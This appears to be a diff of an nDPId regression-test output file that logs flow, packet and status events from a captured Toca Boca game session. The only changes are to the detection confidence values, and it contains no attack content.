00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1649411716491,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1649411716491,"pkt":"eJS0JASgYDjgxTWgCABFAAA8uuUAAD8RUH3AqAJkW8dRe4tXE78AKLqHbCEAAQAADWha0+3vAf8AAAAAABQAAAAAAAAAAI4Q4z8="} 
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":72,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649411857970,"flow_last_seen":1649411857970,"flow_idle_time":200000,"flow_min_l4_payload_len":453,"flow_max_l4_payload_len":453,"flow_tot_l4_payload_len":453,"flow_avg_l4_payload_len":453,"midstream":0,"thread_ts_msec":1649411857970,"l3_proto":"ip4","src_ip":"91.199.81.123","dst_ip":"192.168.2.100","src_port":5055,"dst_port":37167,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01043{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":72,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1649411857970,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":495,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":495,"pkt_l4_len":461,"thread_ts_msec":1649411857970,"pkt":"YDjgxTWgeJS0JASgCABFAAHhCAgAADsRBbZbx1F7wKgCZBO\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"} -00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":73,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1649411629031,"flow_last_seen":1649411629031,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1649411857970,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"91.199.81.123","src_port":50600,"dst_port":5055,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} 
+00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":73,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1649411629031,"flow_last_seen":1649411629031,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1649411857970,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"91.199.81.123","src_port":50600,"dst_port":5055,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} 00559{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":73,"source":"toca-boca.pcap","alias":"nDPId-test","packets-captured":73,"packets-processed":72,"total-skipped-flows":0,"total-l4-payload-len":8692,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":15,"total-detection-updates":0,"total-updates":0,"current-active-flows":2,"total-active-flows":16,"total-idle-flows":14,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":78,"global_ts_msec":1649756653649} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":73,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649756653649,"flow_last_seen":1649756653649,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1649756653649,"l3_proto":"ip4","src_ip":"91.199.81.122","dst_ip":"192.168.2.100","src_port":5055,"dst_port":34503,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1649756653649,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1649756653649,"pkt":"YDjgxTWgeJS0JASgCABFAAA8JawAADsR6bdbx1F6wKgCZBO\/hscAKBKXAAAAAa\/cVZosVa4ZAQAAAAAAABQAAAAAAAAABAAAATQ="} -00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":73,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649756653649,"flow_last_seen":1649756653649,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1649756653649,"l3_proto":"ip4","src_ip":"91.199.81.122","dst_ip":"192.168.2.100","src_port":5055,"dst_port":34503,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} +00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":73,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649756653649,"flow_last_seen":1649756653649,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1649756653649,"l3_proto":"ip4","src_ip":"91.199.81.122","dst_ip":"192.168.2.100","src_port":5055,"dst_port":34503,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} 
00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":74,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649411857970,"flow_last_seen":1649411857970,"flow_idle_time":200000,"flow_min_l4_payload_len":453,"flow_max_l4_payload_len":453,"flow_tot_l4_payload_len":453,"flow_avg_l4_payload_len":453,"midstream":0,"thread_ts_msec":1649756653649,"l3_proto":"ip4","src_ip":"91.199.81.123","dst_ip":"192.168.2.100","src_port":5055,"dst_port":37167,"l4_proto":"udp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} 00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":74,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649411857970,"flow_last_seen":1649411857970,"flow_idle_time":200000,"flow_min_l4_payload_len":453,"flow_max_l4_payload_len":453,"flow_tot_l4_payload_len":453,"flow_avg_l4_payload_len":453,"midstream":0,"thread_ts_msec":1649756653649,"l3_proto":"ip4","src_ip":"91.199.81.123","dst_ip":"192.168.2.100","src_port":5055,"dst_port":37167,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":74,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1649411716027,"flow_last_seen":1649411718310,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":473,"flow_tot_l4_payload_len":1670,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1649756653649,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"91.199.81.123","src_port":35671,"dst_port":5055,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} 
+00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":74,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1649411716027,"flow_last_seen":1649411718310,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":473,"flow_tot_l4_payload_len":1670,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1649756653649,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"91.199.81.123","src_port":35671,"dst_port":5055,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} 00559{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":74,"source":"toca-boca.pcap","alias":"nDPId-test","packets-captured":74,"packets-processed":73,"total-skipped-flows":0,"total-l4-payload-len":8724,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":16,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":17,"total-idle-flows":16,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":85,"global_ts_msec":1649949002676} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":74,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649949002676,"flow_last_seen":1649949002676,"flow_idle_time":200000,"flow_min_l4_payload_len":1200,"flow_max_l4_payload_len":1200,"flow_tot_l4_payload_len":1200,"flow_avg_l4_payload_len":1200,"midstream":0,"thread_ts_msec":1649949002676,"l3_proto":"ip4","src_ip":"91.199.81.225","dst_ip":"192.168.2.100","src_port":5055,"dst_port":50337,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02089{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1649949002676,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1242,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1242,"pkt_l4_len":1208,"thread_ts_msec":1649949002676,"pkt":"YDjgxTWgeJS0JASgCABFAATMcx8AADsRl01bx1HhwKgCZBO\/xKEEuJV9AAAAAbaSYs0pd\/HxCAABAAAABKQAAAAFAAAABQAAAAsAAAAAAAAtKgAAAADzBOYB3hXbAQcgYnVzY28gYW1pZ29zIHNveSBwb2xpY2lhIGZyYW5jZXMVBwcCc3QG8KfG20BqSUED\/RwD\/AMKBwJtZAMBBwJtcAMeBwJzdiID\/wMKBwU0OTExMhUHBwJzdAYOLbLdRgoyQQP9HAP8AwoHAm1kAwEHAm1wAxkHAnN2IgP\/AwoHB1NoZXJsb24VBwcCc3QGcT0Kp+h8QkED\/RwD\/AMKBwJtZAMBBwJtcAMFBwJzdiID\/wMKBxNnYXRvcyBnYW1lXzEwOjUzOjMyFQcHAnN0BjeJQaB7OklBA\/0cA\/wDCgcCbWQDAQcCbXADDwcCc3YDAQP\/AwoHCTEwMDAwNDAwMBUHBwJzdAbjpZt0D0BJQQP9HAP8AwoHAm1kAwEHAm1wAwcHAnN2IgP\/AwoHCeaIkeeahOWPkRUHBwJzdAaWQ4v8vMVJQQP9HAP8AwYHAm1kAwEHAm1wAxQHAnN2IgP\/AwYHEHB2cCBoYXJkZWNvcvCfkoAVBwcCc3QG\/tR42XVFSUED\/RwD\/AMJBwJtZAMBBwJtcAMPBwJzdiID\/wMKBwU0MzY4MhUHBwJzdAbn+6nx3kJJQQP9HAP8AwoHAm1kAwEHAm1wAxwHAnN2IgP\/AwoHBGJvdDMVBwcCc3QGAAAAkNDkSUED\/RwD\/AMKBwJtZAMBBwJtcAMeBwJzdiID\/wMKBw4gZ2FtZV8wMjozNTo0MxUHBwJzdAYzMzNDUqhJQQP9HAP8AwoHAm1kAwEHAm1wIgcCc3YDAQP\/AwoHCkdUQSBWIGxpZmUVBwcCc3QGqvHS3eg1SUED\/RwD\/AMKBwJtZAMBBwJtcAMBBwJzdiID\/wMKBxPRg9GDMSBnYW1lXzA2OjE0OjIwFQcHAnN0BrByaKHFz0ZBA\/0cA\/wDCgcCbWQDAQcCbXADCwcCc3YDAQP\/AwoHBTY1MjIwFQcHAnN0BolBYKUCYEdBA\/0cA\/wDCgcCbWQDAQcCbXAiBwJzdiID\/wMKBwU4MTU0OBUHBwJzdAbfT433oXoxQQP9HAP8AwoHAm1kAwEHAm1wAx4HAnN2IgP\/AwoHDiBnYW1lXzA0OjMwOjQxFQcHAnN0BqabxBDRRUlBA\/0cA\/wDCgcCbWQDAQcCbXADHQcCc3YDAQP\/AwoHBTI4NjQ1FQcHAnN0Bi2ynf8p6kpBA\/0cA\/wDCgcCbWQDAQcCbXADFQcCc3YiA\/8DCgcFMTMxNjUVBwcCc3QGvHSTeDIhQ0ED\/RwD\/AMKBwJtZAMBBwJtcAMVBwJzdiID\/wMKBwU0NDg2OBUHBwJzdAYZBFbuLowxQQP9HAP8AwoHAm1kAwEHAm1wAw0HAnN2IgP\/AwoHCWphamFqYWphahUHBwJzdAYbL90E6kNDQQP9HAP8AwoHAm1kAwEHAm1wAx4HAnN2IgP\/AwoHBDcxNjAVBwcCc3QGj8L16LZhMkED\/RwD\/AM
KBwJtZCIHAm1wAxsHAnN2IgP\/AwoHBuWSjOW5sxUHBwJzdAacxCBQ\/Po0QQP9HAP8AwoHAm1kAwIHAm1wAwMHAnN2"} -00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":75,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1649756653649,"flow_last_seen":1649756653649,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1649949002676,"l3_proto":"ip4","src_ip":"91.199.81.122","dst_ip":"192.168.2.100","src_port":5055,"dst_port":34503,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":75,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1649756653649,"flow_last_seen":1649756653649,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1649949002676,"l3_proto":"ip4","src_ip":"91.199.81.122","dst_ip":"192.168.2.100","src_port":5055,"dst_port":34503,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} 
00559{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":75,"source":"toca-boca.pcap","alias":"nDPId-test","packets-captured":75,"packets-processed":74,"total-skipped-flows":0,"total-l4-payload-len":9924,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":16,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":18,"total-idle-flows":17,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":89,"global_ts_msec":1649959918209} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":75,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649959918209,"flow_last_seen":1649959918209,"flow_idle_time":200000,"flow_min_l4_payload_len":1200,"flow_max_l4_payload_len":1200,"flow_tot_l4_payload_len":1200,"flow_avg_l4_payload_len":1200,"midstream":0,"thread_ts_msec":1649959918209,"l3_proto":"ip4","src_ip":"91.199.81.122","dst_ip":"192.168.2.100","src_port":5055,"dst_port":56920,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02058{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":75,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1649959918209,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1242,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1242,"pkt_l4_len":1208,"thread_ts_msec":1649959918209,"pkt":"YDjgxTWgeJS0JASgCABFAATMlmcAADsRdGxbx1F6wKgCZBO\/3lgEuGJXAAAAAbv54rwVf+7RCAABAAAABKQAAAAFAAAABQAAAB4AAAAAAACDaAAAAADzBOYAAd5oAfRzAAkyNTY1ODIyODNoAAhi\/W8BcwACTFZzAARNYWxscwACQ0x5AARpAAAAAgAAAAMAAAAEAAAABXMAAkNUcwABQWL8YgpzAAJDUHMAAHMAAkNHbwFi\/2IKcwAKMTM2MDA2OTEyNWgABGL\/YgpzAAJMVnMABlNjaG9vbGL9bwFi\/GIHcwAKMjExMDU4MjkwNGgACGL9bwFzAAJMVnMABlNjaG9vbHMAAkNMeQAGaQAAAAAAAAABAAAAAgAAAAMAAAAEAAAABXMAAkNUcwAGRGlncmVmYvxiB3MAAkNQcwAAcwACQ0dvAWL\/YgpzAAg5OTY4MzY0MmgACGL9bwFzAAJMVnMABE1hbGxzAAJDTHkAAWkAAAAFcwACQ1RzAAFRYvxiCnMAAkNQcwAAcwACQ0dvAWL\/YgpzAAkxNTUyMTI1OTdoAAhi\/W8BcwACTFZzAAdGYWN0b3J5cwACQ0x5AAZpAAAAAAAAAAEAAAACAAAAAwAAAAQAAAAFcwACQ1RzAAjZgdin2LHYs2L8YgpzAAJDUHMAAHMAAkNHbwFi\/2IKcwAKMTc2NjI2NTIyN2gACGL9bwFzAAJMVnMACEhhbmdhclYycwACQ0x5AAZpAAAAAAAAAAEAAAACAAAAAwAAAAQAAAAFcwACQ1RzAARCYW5pYvxiCXMAAkNQcwAAcwACQ0dvAWL\/YgpzAAg5MTc3MDA5N2gACGL9bwFzAAJMVnMABk9mZmljZXMAAkNMeQAGaQAAAAAAAAABAAAAAgAAAAMAAAAEAAAABXMAAkNUcwAEWmFza2L8YgpzAAJDUHMAAHMAAkNHbwFi\/2IKcwAJNzU4NjQ3NzY4aAAIYv1vAXMAAkxWcwAETWFsbHMAAkNMeQAGaQAAAAAAAAABAAAAAgAAAAMAAAAEAAAABXMAAkNUcwADY2F0YvxiCnMAAkNQcwAAcwACQ0dvAWL\/YgpzAAoxNzMzNTE4NjcyaAAIYv1vAXMAAkxWcwAETWFsbHMAAkNMeQAGaQAAAAAAAAABAAAAAgAAAAMAAAAEAAAABXMAAkNUcwAFVmlyZ2li\/GIKcwACQ1BzAABzAAJDR28BYv9iCnMACTg0ODM1MzYzN2gACGL9bwFzAAJMVnMACEhhbmdhclYycwACQ0x5AAZpAAAAAAAAAAEAAAACAAAAAwAAAAQAAAAFcwACQ1RzAAdnaXltZXJ0YvxiCnMAAkNQcwAAcwACQ0dvAWL\/YgpzAAoxNzQ5OTgwOTQ2aAAIYv1vAXMAAkxWcwAGU2Nob29scwACQ0x5AAZpAAAAAAAAAAEAAAACAAAAAwAAAAQAAAAFcwACQ1RzAAZ2dnZ2dnZi\/GIJcwACQ1BzAABzAAJDR28BYv9iCnMACjE1ODg5MTA3NDVoAAhi\/W8BcwACTFZzAAZTY2hvb2xzAAJDTHkABmkAAAAAAAAAAQAAAAIAAAADAAAABAAAAAVzAAJDVHMAB
jExMjIzM2L8YgpzAAJDUHMAAHMAAkNHbwFi\/2IKcwAJNzY2Njk2NjY0aAAE"} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":76,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649959918209,"flow_last_seen":1649959918209,"flow_idle_time":200000,"flow_min_l4_payload_len":13,"flow_max_l4_payload_len":13,"flow_tot_l4_payload_len":13,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1649959918209,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"91.199.81.208","src_port":45096,"dst_port":5055,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":76,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1649959918209,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":55,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":55,"pkt_l4_len":21,"thread_ts_msec":1649959918209,"pkt":"eJS0JASgYDjgxTWgCABFAAApx\/wAAD8RQyTAqAJkW8dR0LAoE78AFYZHfX19fX19fX19fX19VA=="} -00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":76,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649959918209,"flow_last_seen":1649959918209,"flow_idle_time":200000,"flow_min_l4_payload_len":13,"flow_max_l4_payload_len":13,"flow_tot_l4_payload_len":13,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1649959918209,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"91.199.81.208","src_port":45096,"dst_port":5055,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} 
+00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":76,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649959918209,"flow_last_seen":1649959918209,"flow_idle_time":200000,"flow_min_l4_payload_len":13,"flow_max_l4_payload_len":13,"flow_tot_l4_payload_len":13,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1649959918209,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"91.199.81.208","src_port":45096,"dst_port":5055,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} 00654{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649949002676,"flow_last_seen":1649949002676,"flow_idle_time":200000,"flow_min_l4_payload_len":1200,"flow_max_l4_payload_len":1200,"flow_tot_l4_payload_len":1200,"flow_avg_l4_payload_len":1200,"midstream":0,"thread_ts_msec":1649959918209,"l3_proto":"ip4","src_ip":"91.199.81.225","dst_ip":"192.168.2.100","src_port":5055,"dst_port":50337,"l4_proto":"udp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} 00593{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649949002676,"flow_last_seen":1649949002676,"flow_idle_time":200000,"flow_min_l4_payload_len":1200,"flow_max_l4_payload_len":1200,"flow_tot_l4_payload_len":1200,"flow_avg_l4_payload_len":1200,"midstream":0,"thread_ts_msec":1649959918209,"l3_proto":"ip4","src_ip":"91.199.81.225","dst_ip":"192.168.2.100","src_port":5055,"dst_port":50337,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00560{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":77,"source":"toca-boca.pcap","alias":"nDPId-test","packets-captured":77,"packets-processed":76,"total-skipped-flows":0,"total-l4-payload-len":11137,"total-not-detected-flows":0,"total-guessed-flows":2,"total-detected-flows":17,"total-detection-updates":0,"total-updates":0,"current-active-flows":2,"total-active-flows":20,"total-idle-flows":18,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":97,"global_ts_msec":1650009948783} 
@@ -99,7 +99,7 @@ 02095{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":77,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1650009948783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1242,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1242,"pkt_l4_len":1208,"thread_ts_msec":1650009948783,"pkt":"YDjgxTWgeJS0JASgCABFAATMx5YAADsRQtZbx1HhwKgCZBO\/qI8EuNNNAAAAAbo0YlQBhGKwCAABAAAABKQAAAAIAAAABQAAAAgAAAADAAAj7AAADYwDAgcCbXAiBwJzdiID\/wMKBwU1NDI1ORUHBwJzdAb0\/dQYS1k2QQP9HAP8AwEHAm1kIgcCbXADDQcCc3YiA\/8DAgdI0LXQtdC10LXQtdC10LXQtdC10LXQtdC10LXQtdC10LXQtdC10LXQtdC10LXQtdC10LXQtdC10LXQtSBnYW1lXzEwOjI3OjAxFQcHAnN0BnsUrmeuBTZBA\/0cA\/wDAQcCbWQDAQcCbXADHgcCc3YDAQP\/AwoHCEdhbWU4NjgzFQcHAnN0BvLSTULOBjZBA\/0cA\/wDAQcCbWQDAgcCbXADIAcCc3YiA\/8DAQcIR2FtZTIxMjkVBwcCc3QG8tJNsnClS0ED\/RwD\/AMBBwJtZAMCBwJtcAMWBwJzdiID\/wMBBwNvcmEVBwcCc3QG+n5qXFaeS0ED\/RwD\/AMHBwJtZAMCBwJtcAMgBwJzdiID\/wMKBwhHYW1lNTA4NBUHBwJzdAakcD2aTKZLQQP9HAP8AwEHAm1kAwIHAm1wAxUHAnN2IgP\/AwEHCEdhbWU2ODM3FQcHAnN0BlpkO2+BpEtBA\/0cA\/wDAQcCbWQDAgcCbXADGwcCc3YiA\/8DAQcIR2FtZTc1MDIVBwcCc3QGxSCwkiDnREED\/RwD\/AMBBwJtZAMCBwJtcAMZBwJzdiID\/wMBBwhHYW1lODMzNRUHBwJzdAamm8TQnahLQQP9HAP8AwEHAm1kAwIHAm1wIgcCc3YiA\/8DAQcIR2FtZTg5MjYVBwcCc3QGtvP9xMypS0ED\/RwD\/AMBBwJtZAMCBwJtcAMeBwJzdiID\/wMBBwRtZW1lFQcHAnN0Bq5H4YrzN0lBA\/0cA\/wDAgcCbWQDAgcCbXADHgcCc3YiA\/8DAgcIR2FtZTMxMjUVBwcCc3QGHVpkG0xbNkED\/RwD\/AMBBwJtZAMCBwJtcAMdBwJzdiID\/wMBBwhHYW1lNDQxMxUHBwJzdAYzMzMT7lo2QQP9HAP8AwEHAm1kAwIHAm1wAw4HAnN2IgP\/AwEHAzAwMBUHBwJzdAb+1Hi5oeZEQQP9HAP8AwIHAm1kAwIHAm1wAx4HAnN2IgP\/AwIHCEdhbWUyMDU4FQcHAnN0Bilcj7LI5kRBA\/0cA\/wDAQcCbWQDAgcCbXADBwcCc3YiA\/8DAQcIR2FtZTQ2OTYVBwcCc3QGoBovvVRbNkED\/RwD\/AMBBwJtZAMCBwJtcAMQBwJzdiID\/wMBBwUyMzQzMBUHBwJzdAZWDi2CBeZEQQP9HAP8AwEHAm1kAwIHAm1wAxsHAnN2IgP\/AwoHCEdhbWU3NDUzFQcHAnN0BhkEVo6EOUlBA\/0cA\/wDAQcCbWQDAgcCbXADDQcCc3YiA\/8DAQcFNjA4NDIVBwcCc3QGuB6Fq9mpS0ED\/RwD\/AMBBwJtZAMCBwJtcAMQBwJzdiID\/wMKBwRPa3VsFQcHAnN
0BkSLbMc\/WzZBA\/0cA\/wDAwcCbWQDAQcCbXADFAcCc3YiA\/8DCgcIR2FtZTQzODYVBwcCc3QGYhBYacWlS0ED\/RwD\/AMBBwJtZAMCBwJtcAMV"} 00654{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649959918209,"flow_last_seen":1649959918209,"flow_idle_time":200000,"flow_min_l4_payload_len":1200,"flow_max_l4_payload_len":1200,"flow_tot_l4_payload_len":1200,"flow_avg_l4_payload_len":1200,"midstream":0,"thread_ts_msec":1650009948783,"l3_proto":"ip4","src_ip":"91.199.81.122","dst_ip":"192.168.2.100","src_port":5055,"dst_port":56920,"l4_proto":"udp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} 00593{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649959918209,"flow_last_seen":1649959918209,"flow_idle_time":200000,"flow_min_l4_payload_len":1200,"flow_max_l4_payload_len":1200,"flow_tot_l4_payload_len":1200,"flow_avg_l4_payload_len":1200,"midstream":0,"thread_ts_msec":1650009948783,"l3_proto":"ip4","src_ip":"91.199.81.122","dst_ip":"192.168.2.100","src_port":5055,"dst_port":56920,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 